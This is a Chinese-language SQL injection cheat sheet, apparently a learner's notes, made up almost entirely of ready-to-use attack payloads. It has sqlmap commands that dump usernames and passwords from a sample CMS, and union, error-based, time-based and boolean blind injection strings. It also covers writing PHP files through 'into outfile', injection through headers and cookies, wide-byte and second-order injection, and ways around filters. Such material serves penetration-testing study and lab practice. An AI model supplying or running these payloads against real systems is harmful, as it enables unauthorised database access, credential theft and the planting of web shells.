SQL注入

sql注入验证:

\

'
and 1=1
and 1=2

 

sqlmap基本命令

sqlmap -r *.txt -p id
sqlmap -u '192.168.1.101/cms/show.php?id=38' --dbs
sqlmap -u '192.168.1.101/cms/show.php?id=38' -D cms --tables
sqlmap -u '192.168.1.101/cms/show.php?id=38' -D cms -T cms_users --columns
sqlmap -u '192.168.1.101/cms/show.php?id=38' -D cms -T cms_users -C username,password --dump --batch


注入

order by        判断字段数
union select    联合查询获取表名、字段名、字段值

?id=1' order by 3 --
?id=0' union select 1,2,3 --

获取表名
0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --


获取字段名
0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --


获取字段值
0' union select 1,group_concat(username,0x3a,password),3 from users--

 

盲注分类:

时间盲注:
?id=1' if(ascii(substr(database(),1,1)=115,1,sleep(3))) --
当数据库第一个字母的ascii码是115时,执行sleep()

布尔盲注:
?id=1' and length(database())=8 --

 

文件读取和写入

select load_file('path')
union select 1,'<?php phpinfo();?>',3 into outfile 'path' --

 

报错注入

rand()        随机函数
floor()        取整函数
count()        计数函数
group by clause    分组子句


获取数据库
0' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --

获取表名
0' union select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --

获取用户信息
0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --

双引号获取数据库
0" union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --

 

注入绕过

大小写、双写、编码、内联注释

 

POST盲注

admin' and (select (if(length(database())>5,sleep(5),null))) --
admin' and (length(database())>5) --

 

User-Agent注入:

在 User-Agent 请求头处注入

Referer注入:

在 Referer 请求头处注入


payload:
' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1'='1
' or '1'='1
' or (length(database())) >8 or if(1=1, sleep(5), null) or '1' = '1

sqlmap -r 读取请求文件时，用 * 标记需要测试的注入位置

 

update语句

update table_name set password=test where id=1
passwd=123'or updatexml(1,concat(0x7e,database(),0x7e),1) #

 

cookie注入

cookie 值经 base64 编码后的注入
base64编码
== 为 base64 编码的填充结尾

urlencode

%0a    换行
%0c    换页(FF)
%0d    回车(CR)
%09    tab键
%20    空格

&& and
||     or

GBK宽字节注入

-1%df' union select 1,2,3 --
%81

二次注入

用户名为admin' -- -

 

updatexml()与extractvalue()

select * from table where id=1 and updatexml(-1,concat(0x7e,database(),0x7e),1)
select * from user where id=1 and extractvalue(-1,concat(0x7e,version(),0x7e))

 
